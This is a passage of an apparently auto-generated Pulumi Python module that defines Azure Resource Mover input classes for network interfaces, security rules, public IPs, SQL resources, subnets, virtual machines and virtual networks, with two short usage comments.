primary: Optional[pulumi.Input[bool]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_allocation_method: Optional[pulumi.Input[str]] = None,
public_ip: Optional[pulumi.Input['PublicIpReferenceArgs']] = None,
subnet: Optional[pulumi.Input['SubnetReferenceArgs']] = None):
"""
Defines NIC IP configuration properties.
:param pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]] load_balancer_backend_address_pools: Gets or sets the references of the load balancer backend address pools.
:param pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]] load_balancer_nat_rules: Gets or sets the references of the load balancer NAT rules.
:param pulumi.Input[str] name: Gets or sets the IP configuration name.
:param pulumi.Input[bool] primary: Gets or sets a value indicating whether this IP configuration is the primary.
:param pulumi.Input[str] private_ip_address: Gets or sets the private IP address of the network interface IP Configuration.
:param pulumi.Input[str] private_ip_allocation_method: Gets or sets the private IP address allocation method.
:param pulumi.Input['PublicIpReferenceArgs'] public_ip: Defines reference to a public IP.
:param pulumi.Input['SubnetReferenceArgs'] subnet: Defines reference to subnet.
"""
if load_balancer_backend_address_pools is not None:
pulumi.set(__self__, "load_balancer_backend_address_pools", load_balancer_backend_address_pools)
if load_balancer_nat_rules is not None:
pulumi.set(__self__, "load_balancer_nat_rules", load_balancer_nat_rules)
if name is not None:
pulumi.set(__self__, "name", name)
if primary is not None:
pulumi.set(__self__, "primary", primary)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if private_ip_allocation_method is not None:
pulumi.set(__self__, "private_ip_allocation_method", private_ip_allocation_method)
if public_ip is not None:
pulumi.set(__self__, "public_ip", public_ip)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
@property
@pulumi.getter(name="loadBalancerBackendAddressPools")
def load_balancer_backend_address_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]]]:
"""
Gets or sets the references of the load balancer backend address pools.
"""
return pulumi.get(self, "load_balancer_backend_address_pools")
@load_balancer_backend_address_pools.setter
def load_balancer_backend_address_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerBackendAddressPoolReferenceArgs']]]]):
pulumi.set(self, "load_balancer_backend_address_pools", value)
@property
@pulumi.getter(name="loadBalancerNatRules")
def load_balancer_nat_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]]]:
"""
Gets or sets the references of the load balancer NAT rules.
"""
return pulumi.get(self, "load_balancer_nat_rules")
@load_balancer_nat_rules.setter
def load_balancer_nat_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LoadBalancerNatRuleReferenceArgs']]]]):
pulumi.set(self, "load_balancer_nat_rules", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the IP configuration name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def primary(self) -> Optional[pulumi.Input[bool]]:
"""
Gets or sets a value indicating whether this IP configuration is the primary.
"""
return pulumi.get(self, "primary")
@primary.setter
def primary(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "primary", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the private IP address of the network interface IP Configuration.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="privateIpAllocationMethod")
def private_ip_allocation_method(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the private IP address allocation method.
"""
return pulumi.get(self, "private_ip_allocation_method")
@private_ip_allocation_method.setter
def private_ip_allocation_method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_allocation_method", value)
@property
@pulumi.getter(name="publicIp")
def public_ip(self) -> Optional[pulumi.Input['PublicIpReferenceArgs']]:
"""
Defines reference to a public IP.
"""
return pulumi.get(self, "public_ip")
@public_ip.setter
def public_ip(self, value: Optional[pulumi.Input['PublicIpReferenceArgs']]):
pulumi.set(self, "public_ip", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input['SubnetReferenceArgs']]:
"""
Defines reference to subnet.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input['SubnetReferenceArgs']]):
pulumi.set(self, "subnet", value)


@pulumi.input_type
class NsgReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str]):
"""
Defines reference to NSG.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)


@pulumi.input_type
class NsgSecurityRuleArgs:
def __init__(__self__, *,
access: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
destination_address_prefix: Optional[pulumi.Input[str]] = None,
destination_port_range: Optional[pulumi.Input[str]] = None,
direction: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
protocol: Optional[pulumi.Input[str]] = None,
source_address_prefix: Optional[pulumi.Input[str]] = None,
source_port_range: Optional[pulumi.Input[str]] = None):
"""
Security Rule data model for Network Security Groups.
:param pulumi.Input[str] access: Gets or sets whether network traffic is allowed or denied.
Possible values are "Allow" and "Deny".
:param pulumi.Input[str] description: Gets or sets a description for this rule. Restricted to 140 chars.
:param pulumi.Input[str] destination_address_prefix: Gets or sets destination address prefix. CIDR or destination IP range.
A "*" can also be used to match all destination IPs. Default tags such
as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
:param pulumi.Input[str] destination_port_range: Gets or sets Destination Port or Range. Integer or range between
0 and 65535. A "*" can also be used to match all ports.
:param pulumi.Input[str] direction: Gets or sets the direction of the rule: InBound or Outbound. The
direction specifies if the rule will be evaluated on incoming or outgoing traffic.
:param pulumi.Input[str] name: Gets or sets the Security rule name.
:param pulumi.Input[int] priority: Gets or sets the priority of the rule. The value can be between
100 and 4096. The priority number must be unique for each rule in the collection.
The lower the priority number, the higher the priority of the rule.
:param pulumi.Input[str] protocol: Gets or sets Network protocol this rule applies to. Can be Tcp, Udp or All(*).
:param pulumi.Input[str] source_address_prefix: Gets or sets source address prefix. CIDR or source IP range. A
"*" can also be used to match all source IPs. Default tags such as 'VirtualNetwork',
'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress
rule, specifies where network traffic originates from.
:param pulumi.Input[str] source_port_range: Gets or sets Source Port or Range. Integer or range between 0 and
65535. A "*" can also be used to match all ports.
"""
if access is not None:
pulumi.set(__self__, "access", access)
if description is not None:
pulumi.set(__self__, "description", description)
if destination_address_prefix is not None:
pulumi.set(__self__, "destination_address_prefix", destination_address_prefix)
if destination_port_range is not None:
pulumi.set(__self__, "destination_port_range", destination_port_range)
if direction is not None:
pulumi.set(__self__, "direction", direction)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
if source_address_prefix is not None:
pulumi.set(__self__, "source_address_prefix", source_address_prefix)
if source_port_range is not None:
pulumi.set(__self__, "source_port_range", source_port_range)
@property
@pulumi.getter
def access(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets whether network traffic is allowed or denied.
Possible values are "Allow" and "Deny".
"""
return pulumi.get(self, "access")
@access.setter
def access(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets a description for this rule. Restricted to 140 chars.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="destinationAddressPrefix")
def destination_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets destination address prefix. CIDR or destination IP range.
A "*" can also be used to match all destination IPs. Default tags such
as 'VirtualNetwork', 'AzureLoadBalancer' and 'Internet' can also be used.
"""
return pulumi.get(self, "destination_address_prefix")
@destination_address_prefix.setter
def destination_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_address_prefix", value)
@property
@pulumi.getter(name="destinationPortRange")
def destination_port_range(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets Destination Port or Range. Integer or range between
0 and 65535. A "*" can also be used to match all ports.
"""
return pulumi.get(self, "destination_port_range")
@destination_port_range.setter
def destination_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_port_range", value)
@property
@pulumi.getter
def direction(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the direction of the rule: InBound or Outbound. The
direction specifies if the rule will be evaluated on incoming or outgoing traffic.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "direction", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the Security rule name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
Gets or sets the priority of the rule. The value can be between
100 and 4096. The priority number must be unique for each rule in the collection.
The lower the priority number, the higher the priority of the rule.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets Network protocol this rule applies to. Can be Tcp, Udp or All(*).
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets source address prefix. CIDR or source IP range. A
"*" can also be used to match all source IPs. Default tags such as 'VirtualNetwork',
'AzureLoadBalancer' and 'Internet' can also be used. If this is an ingress
rule, specifies where network traffic originates from.
"""
return pulumi.get(self, "source_address_prefix")
@source_address_prefix.setter
def source_address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_address_prefix", value)
@property
@pulumi.getter(name="sourcePortRange")
def source_port_range(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets Source Port or Range. Integer or range between 0 and
65535. A "*" can also be used to match all ports.
"""
return pulumi.get(self, "source_port_range")
@source_port_range.setter
def source_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_port_range", value)
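# Illustrative usage (not part of the generated module; values are hypothetical):
# an inbound allow rule for HTTPS traffic.
#
#   https_rule = NsgSecurityRuleArgs(
#       name='allow-https-inbound',
#       access='Allow',
#       direction='Inbound',
#       priority=300,
#       protocol='Tcp',
#       source_address_prefix='*',
#       source_port_range='*',
#       destination_address_prefix='*',
#       destination_port_range='443',
#   )
#
# Rules with lower priority numbers take precedence, and each priority must be
# unique within the collection.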


@pulumi.input_type
class PublicIPAddressResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
domain_name_label: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
public_ip_allocation_method: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
Defines the public IP address resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/publicIPAddresses'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[str] domain_name_label: Gets or sets the domain name label.
:param pulumi.Input[str] fqdn: Gets or sets the fully qualified domain name.
:param pulumi.Input[str] public_ip_allocation_method: Gets or sets public IP allocation method.
:param pulumi.Input[str] sku: Gets or sets the public IP SKU.
:param pulumi.Input[str] zones: Gets or sets public IP zones.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/publicIPAddresses')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if domain_name_label is not None:
pulumi.set(__self__, "domain_name_label", domain_name_label)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if public_ip_allocation_method is not None:
pulumi.set(__self__, "public_ip_allocation_method", public_ip_allocation_method)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/publicIPAddresses'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="domainNameLabel")
def domain_name_label(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the domain name label.
"""
return pulumi.get(self, "domain_name_label")
@domain_name_label.setter
def domain_name_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain_name_label", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the fully qualified domain name.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="publicIpAllocationMethod")
def public_ip_allocation_method(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets public IP allocation method.
"""
return pulumi.get(self, "public_ip_allocation_method")
@public_ip_allocation_method.setter
def public_ip_allocation_method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_ip_allocation_method", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the public IP SKU.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets public IP zones.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
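# Illustrative usage (not part of the generated module; values are hypothetical):
# a Standard-SKU, statically allocated public IP with a DNS label.
#
#   pip_settings = PublicIPAddressResourceSettingsArgs(
#       resource_type='Microsoft.Network/publicIPAddresses',
#       target_resource_name='target-pip',
#       public_ip_allocation_method='Static',
#       sku='Standard',
#       domain_name_label='myapp',
#   )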


@pulumi.input_type
class PublicIpReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str]):
"""
Defines reference to a public IP.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)


@pulumi.input_type
class ResourceGroupResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the resource group resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'resourceGroups'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'resourceGroups')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'resourceGroups'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)


@pulumi.input_type
class SqlDatabaseResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
zone_redundant: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]] = None):
"""
Defines the Sql Database resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/databases'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Union[str, 'ZoneRedundant']] zone_redundant: Defines the zone redundant resource setting.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Sql/servers/databases')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if zone_redundant is not None:
pulumi.set(__self__, "zone_redundant", zone_redundant)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/databases'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="zoneRedundant")
def zone_redundant(self) -> Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]:
"""
Defines the zone redundant resource setting.
"""
return pulumi.get(self, "zone_redundant")
@zone_redundant.setter
def zone_redundant(self, value: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]):
pulumi.set(self, "zone_redundant", value)


@pulumi.input_type
class SqlElasticPoolResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
zone_redundant: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]] = None):
"""
Defines the Sql ElasticPool resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/elasticPools'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Union[str, 'ZoneRedundant']] zone_redundant: Defines the zone redundant resource setting.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Sql/servers/elasticPools')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if zone_redundant is not None:
pulumi.set(__self__, "zone_redundant", zone_redundant)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers/elasticPools'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="zoneRedundant")
def zone_redundant(self) -> Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]:
"""
Defines the zone redundant resource setting.
"""
return pulumi.get(self, "zone_redundant")
@zone_redundant.setter
def zone_redundant(self, value: Optional[pulumi.Input[Union[str, 'ZoneRedundant']]]):
pulumi.set(self, "zone_redundant", value)


@pulumi.input_type
class SqlServerResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the SQL Server resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Sql/servers')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Sql/servers'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)


@pulumi.input_type
class SubnetReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Defines reference to subnet.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
:param pulumi.Input[str] name: Gets the name of the proxy resource on the target side.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets the name of the proxy resource on the target side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)


@pulumi.input_type
class SubnetResourceSettingsArgs:
def __init__(__self__, *,
address_prefix: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network_security_group: Optional[pulumi.Input['NsgReferenceArgs']] = None):
"""
Defines the virtual network subnets resource settings.
:param pulumi.Input[str] address_prefix: Gets or sets address prefix for the subnet.
:param pulumi.Input[str] name: Gets or sets the Subnet name.
:param pulumi.Input['NsgReferenceArgs'] network_security_group: Defines reference to NSG.
"""
if address_prefix is not None:
pulumi.set(__self__, "address_prefix", address_prefix)
if name is not None:
pulumi.set(__self__, "name", name)
if network_security_group is not None:
pulumi.set(__self__, "network_security_group", network_security_group)
@property
@pulumi.getter(name="addressPrefix")
def address_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets address prefix for the subnet.
"""
return pulumi.get(self, "address_prefix")
@address_prefix.setter
def address_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "address_prefix", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the Subnet name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkSecurityGroup")
def network_security_group(self) -> Optional[pulumi.Input['NsgReferenceArgs']]:
"""
Defines reference to NSG.
"""
return pulumi.get(self, "network_security_group")
@network_security_group.setter
def network_security_group(self, value: Optional[pulumi.Input['NsgReferenceArgs']]):
pulumi.set(self, "network_security_group", value)


@pulumi.input_type
class VirtualMachineResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
target_availability_set_id: Optional[pulumi.Input[str]] = None,
target_availability_zone: Optional[pulumi.Input[Union[str, 'TargetAvailabilityZone']]] = None,
target_vm_size: Optional[pulumi.Input[str]] = None):
"""
Gets or sets the virtual machine resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/virtualMachines'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[str] target_availability_set_id: Gets or sets the target availability set id for virtual machines not in an availability set at source.
:param pulumi.Input[Union[str, 'TargetAvailabilityZone']] target_availability_zone: Gets or sets the target availability zone.
:param pulumi.Input[str] target_vm_size: Gets or sets the target virtual machine size.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Compute/virtualMachines')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if target_availability_set_id is not None:
pulumi.set(__self__, "target_availability_set_id", target_availability_set_id)
if target_availability_zone is not None:
pulumi.set(__self__, "target_availability_zone", target_availability_zone)
if target_vm_size is not None:
pulumi.set(__self__, "target_vm_size", target_vm_size)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/virtualMachines'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="targetAvailabilitySetId")
def target_availability_set_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the target availability set id for virtual machines not in an availability set at source.
"""
return pulumi.get(self, "target_availability_set_id")
@target_availability_set_id.setter
def target_availability_set_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_availability_set_id", value)
@property
@pulumi.getter(name="targetAvailabilityZone")
def target_availability_zone(self) -> Optional[pulumi.Input[Union[str, 'TargetAvailabilityZone']]]:
"""
Gets or sets the target availability zone.
"""
return pulumi.get(self, "target_availability_zone")
@target_availability_zone.setter
def target_availability_zone(self, value: Optional[pulumi.Input[Union[str, 'TargetAvailabilityZone']]]):
pulumi.set(self, "target_availability_zone", value)
@property
@pulumi.getter(name="targetVmSize")
def target_vm_size(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the target virtual machine size.
"""
return pulumi.get(self, "target_vm_size")
@target_vm_size.setter
def target_vm_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_vm_size", value)
@pulumi.input_type
class VirtualNetworkResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
address_space: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_ddos_protection: Optional[pulumi.Input[bool]] = None,
subnets: Optional[pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]]] = None):
"""
Defines the virtual network resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Network/virtualNetworks.
Expected value is 'Microsoft.Network/virtualNetworks'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Sequence[pulumi.Input[str]]] address_space: Gets or sets the address prefixes for the virtual network.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: Gets or sets DHCPOptions that contains an array of DNS servers available to VMs
deployed in the virtual network.
:param pulumi.Input[bool] enable_ddos_protection: Gets or sets a value indicating whether
DDoS protection should be switched on.
:param pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]] subnets: Gets or sets the list of subnets in the virtual network.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/virtualNetworks')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if address_space is not None:
pulumi.set(__self__, "address_space", address_space)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if enable_ddos_protection is not None:
pulumi.set(__self__, "enable_ddos_protection", enable_ddos_protection)
if subnets is not None:
pulumi.set(__self__, "subnets", subnets)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Network/virtualNetworks.
Expected value is 'Microsoft.Network/virtualNetworks'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="addressSpace")
def address_space(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Gets or sets the address prefixes for the virtual network.
"""
return pulumi.get(self, "address_space")
@address_space.setter
def address_space(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "address_space", value)
@property
